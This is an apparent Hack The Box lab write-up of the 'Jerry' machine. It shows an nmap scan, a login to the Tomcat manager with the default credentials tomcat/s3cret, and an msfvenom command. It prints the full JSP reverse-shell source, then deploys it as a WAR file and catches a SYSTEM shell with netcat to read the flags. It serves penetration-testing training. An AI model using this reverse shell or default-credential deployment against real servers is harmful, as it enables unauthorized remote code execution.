Hack The Box: Jerry

This is my fourth write-up in a series on the Hack The Box Beginner Track. This challenge is called Jerry, and it's a lot more like a classic CTF than the previous two in my view, Find the Easy Pass and Weak RSA.


Firing up the box and our attack machine, let's start with a straightforward Nmap scan:

$ nmap -Pn -A -T4 jerry.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2022-12-11 16:11 GMT
Nmap scan report for jerry.htb (
Host is up (0.014s latency).
Not shown: 999 filtered tcp ports (no-response)
8080/tcp open  http    Apache Tomcat/Coyote JSP engine 1.1
|_http-title: Apache Tomcat/7.0.88
|_http-favicon: Apache Tomcat
|_http-server-header: Apache-Coyote/1.1

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 13.75 seconds

It looks like there's a web server listening to port 8080, and it's running Apache Tomcat. Apache Tomcat is a web server written in Java and designed to serve Jakarta Server Pages, otherwise known as Java Server Pages. Let's head over to http://jerry.htb:8080 and take a look:

Apache Tomcat

There's a few links to dig into here. Clicking on "Server Status", we're presented with a basic auth login prompt, and we don't have any credentials, so we can't get in:

Apache Tomcat HTTP 401

We're not authorised to view the requested page. Instead we're presented with some helpful information on how to configure Tomcat with the right roles for an example account. That example account has the username and password "tomcat" and "s3cret". Let's try those at the login prompt again. Maybe the admin didn't bother to change the defaults...

Apache Tomcat Server Status

Wow... that was surprisingly straightforward. Okay, so this gives us a bit more info about the server that Tomcat is running on. Heading back to the landing page and clicking on "Manager App" gives this:

Apache Tomcat Manager App

Finally, visiting the "Host Manager" link gives us an HTTP 403 Forbidden response, despite our credentials. This suggest the roles associated with our user don't have enough permissions to access this page.


Reading around, it seems that the manager app will allow us to install a new WAR (Web Application Resource) application, allowing us to run arbitrary Java code on the server. If we can install a reverse shell this way, it'll allow us to poke around the system at our leisure.

The next step is to generate the reverse shell application. For this we can use msfvenom, the part of the Metasploit framework used to generate payloads:

$ msfvenom -p java/jsp_shell_reverse_tcp LHOST= LPORT=1337 -f war > reverse.war

Under the hood, msfvenom has generated the following code and compiled it for us to a WAR file:

<%@page import="java.lang.*"%>
<%@page import="java.util.*"%>
<%@page import="java.io.*"%>
<%@page import="java.net.*"%>

  class StreamConnector extends Thread
    InputStream sw;
    OutputStream hd;

    StreamConnector( InputStream sw, OutputStream hd )
      this.sw = sw;
      this.hd = hd;

    public void run()
      BufferedReader nr  = null;
      BufferedWriter alc = null;
        nr  = new BufferedReader( new InputStreamReader( this.sw ) );
        alc = new BufferedWriter( new OutputStreamWriter( this.hd ) );
        char buffer[] = new char[8192];
        int length;
        while( ( length = nr.read( buffer, 0, buffer.length ) ) > 0 )
          alc.write( buffer, 0, length );
      } catch( Exception e ){}
        if( nr != null )
        if( alc != null )
      } catch( Exception e ){}

    String ShellPath;
    if (System.getProperty("os.name").toLowerCase().indexOf("windows") == -1) {
      ShellPath = new String("/bin/sh");
    } else {
      ShellPath = new String("cmd.exe");

    Socket socket = new Socket( "", 1337 );
    Process process = Runtime.getRuntime().exec( ShellPath );
    ( new StreamConnector( process.getInputStream(), socket.getOutputStream() ) ).start();
    ( new StreamConnector( socket.getInputStream(), process.getOutputStream() ) ).start();
  } catch( Exception e ) {}

With the payload in hand, we can install it as a new application using the manager app console in Tomcat:

Tomcat App Upload

Clicking "deploy", we see the new app in the list:

Tomcat App Upload

Next, we open a port on our attack machine using netcat with nc -nlvp 1337. Visiting the URL for the reverse.war binary triggers the reverse shell:

$ curl http://tomcat:s3cret@jerry.htb:8080/reverse/

Meanwhile, in our netcat session...

$ nc -nlvp 1337
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::1337
Ncat: Listening on
Ncat: Connection from
Ncat: Connection from
Microsoft Windows [Version 6.3.9600]
(c) 2013 Microsoft Corporation. All rights reserved.


From here we can poke around the target system, starting with privileges for our user:

C:\apache-tomcat-7.0.88>whoami /all
whoami /all


User Name           SID     
=================== ========
nt authority\system S-1-5-18


Group Name                             Type             SID          Attributes                                        
====================================== ================ ============ ==================================================
BUILTIN\Administrators                 Alias            S-1-5-32-544 Enabled by default, Enabled group, Group owner    
Everyone                               Well-known group S-1-1-0      Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users       Well-known group S-1-5-11     Mandatory group, Enabled by default, Enabled group
Mandatory Label\System Mandatory Level Label            S-1-16-16384                                                   


Privilege Name                  Description                               State   
=============================== ========================================= ========
SeAssignPrimaryTokenPrivilege   Replace a process level token             Disabled
SeLockMemoryPrivilege           Lock pages in memory                      Enabled 
SeIncreaseQuotaPrivilege        Adjust memory quotas for a process        Disabled
SeTcbPrivilege                  Act as part of the operating system       Enabled 
SeSecurityPrivilege             Manage auditing and security log          Disabled
SeTakeOwnershipPrivilege        Take ownership of files or other objects  Disabled
SeLoadDriverPrivilege           Load and unload device drivers            Disabled
SeSystemProfilePrivilege        Profile system performance                Enabled 
SeSystemtimePrivilege           Change the system time                    Disabled
SeProfileSingleProcessPrivilege Profile single process                    Enabled 
SeIncreaseBasePriorityPrivilege Increase scheduling priority              Enabled 
SeCreatePagefilePrivilege       Create a pagefile                         Enabled 
SeCreatePermanentPrivilege      Create permanent shared objects           Enabled 
SeBackupPrivilege               Back up files and directories             Disabled
SeRestorePrivilege              Restore files and directories             Disabled
SeShutdownPrivilege             Shut down the system                      Disabled
SeDebugPrivilege                Debug programs                            Enabled 
SeAuditPrivilege                Generate security audits                  Enabled 
SeSystemEnvironmentPrivilege    Modify firmware environment values        Disabled
SeChangeNotifyPrivilege         Bypass traverse checking                  Enabled 
SeUndockPrivilege               Remove computer from docking station      Disabled
SeManageVolumePrivilege         Perform volume maintenance tasks          Disabled
SeImpersonatePrivilege          Impersonate a client after authentication Enabled 
SeCreateGlobalPrivilege         Create global objects                     Enabled 
SeIncreaseWorkingSetPrivilege   Increase a process working set            Enabled 
SeTimeZonePrivilege             Change the time zone                      Enabled 
SeCreateSymbolicLinkPrivilege   Create symbolic links                     Enabled 


Looks like Tomcat is running as the system user, which gives us quite a lot of power 😈 It also means we don't need to bother with privilege escalation, as we already have everything we need to read the flags. Heading over to the Administrator's desktop, the canonical place to find Windows flags in HTB, we can take a look around:

C:\apache-tomcat-7.0.88>cd ../Users/Administrator/Desktop
cd ../Users/Administrator/Desktop

 Volume in drive C has no label.
 Volume Serial Number is 0834-6C04

 Directory of C:\Users\Administrator\Desktop

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:09 AM    <DIR>          flags
               0 File(s)              0 bytes
               3 Dir(s)   2,291,466,240 bytes free

At this point I sort of expected to find a single file with the flag for the admin user. Not being a Windows regular, it took me an embarrassing amount of time to realise that flags is in fact a directory...

C:\Users\Administrator\Desktop>cd flags
cd flags

 Volume in drive C has no label.
 Volume Serial Number is 0834-6C04

 Directory of C:\Users\Administrator\Desktop\flags

06/19/2018  06:09 AM    <DIR>          .
06/19/2018  06:09 AM    <DIR>          ..
06/19/2018  06:11 AM                88 2 for the price of 1.txt
               1 File(s)             88 bytes
               2 Dir(s)   2,289,696,768 bytes free

C:\Users\Administrator\Desktop\flags>type "2 for the price of 1.txt"
type "2 for the price of 1.txt"


Great! All the flags we need in one place.

I'd be lying if I said I found this challenge interesting. It didn't take a lot of research to find out how to exploit Tomcat, and finding some credentials to get us to the point where we could do that proved pretty straightforward. The next challenge, You Know 0xDiablos, is a lot more involved from a technical standpoint, which I think makes it much more engaging.